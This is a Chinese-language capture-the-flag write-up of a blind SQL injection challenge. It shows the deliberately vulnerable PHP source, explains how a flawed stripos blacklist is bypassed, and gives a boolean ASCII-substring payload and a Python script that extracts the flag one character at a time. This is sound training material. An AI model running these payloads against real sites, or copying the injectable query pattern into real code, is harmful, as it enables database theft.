0x00 前言
惭愧,好像是第一次做盲注题(之前肯定看过,不深入而已…)
直接看了wp进行复现了
根据特定环境适用的攻击手法,熟悉一下script编写
0x01 复现
贴一下源码方便后续理解
<?php
$dbuser='root';
$dbpass='root';
function safe($sql){
#被过滤的内容 函数基本没过滤
$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
foreach($blackList as $blackitem){
if(stripos($sql,$blackitem)){
return False;
}
}
return True;
}
if(isset($_POST['id'])){
$id = $_POST['id'];
}else{
die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
die(mysql_error());
}
mysql_select_db("ctf",$db);
if(safe($id)){
$query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
if($query){
$result = mysql_fetch_array($query);
if($result){
echo $result['content'];
}else{
echo "Error Occured When Fetch Result.";
}
}else{
var_dump($query);
}
}else{
die("SQL Injection Checked.");
}
稍微fuzz测试一下
length 482皆为sql injection checked
解释一下有些在黑名单的fuzz返回bool(false)的原因(坑!)
function safe($sql){
#被过滤的内容 函数基本没过滤
$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
foreach($blackList as $blackitem){
if(stripos($sql,$blackitem)){
return False;
}
}
return True;
}
注意到这边检测时用的是 stripos:查询第一次出现的位置
所以如果你fuzz时写在开头,那么stripos($id,$blackitem)返回的就是0,那么第一层就绕过了(return True了就)
if(safe($id)){
$query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
if($query){
$result = mysql_fetch_array($query);
if($result){
echo $result['content'];
}else{
echo "Error Occured When Fetch Result.";
}
}else{
var_dump($query);
}
}else{
die("SQL Injection Checked.");
}
再往下看,因为sql查询语句语法存在问题,所以mysql_query执行错误返回false
brain.md
通过0,1返回值不同可以进行盲注
空格过滤可以用括号包裹绕过
select(flag)from(flag)
ascii(substr((select(flag)from(flag)),1,1))=102 # f的ASCII
id=if((ascii(substr((select(flag)from(flag)),1,1))=102),1,0)
ASCII正确返回Hello,g…girlfriend
建议python写脚本
黏上我自己写的
import requests
url='http://c3da9e81-43de-4a6e-8020-b5691bb84f33.node4.buuoj.cn:81/'
result=''
for l in range(1,43):
for i in range(32,128):
payload='if((ascii(substr((select(flag)from(flag)),%d,1))=%d),1,0)'%(l,i)
data={'id':payload}
res=requests.post(url,data=data)
res.encoding=res.apparent_encoding
if 'girlfriend' in res.text:
result+=chr(i)
print(result)
break
if '}' in result:
break
if '}' in result:
break
print(result)
参考
https://www.cnblogs.com/20175211lyz/p/11435298.html
https://blog.csdn.net/m0_46587008/article/details/110304855
0x02 rethink
不得不说sql注入真的很看经验
经验不足雀氏八星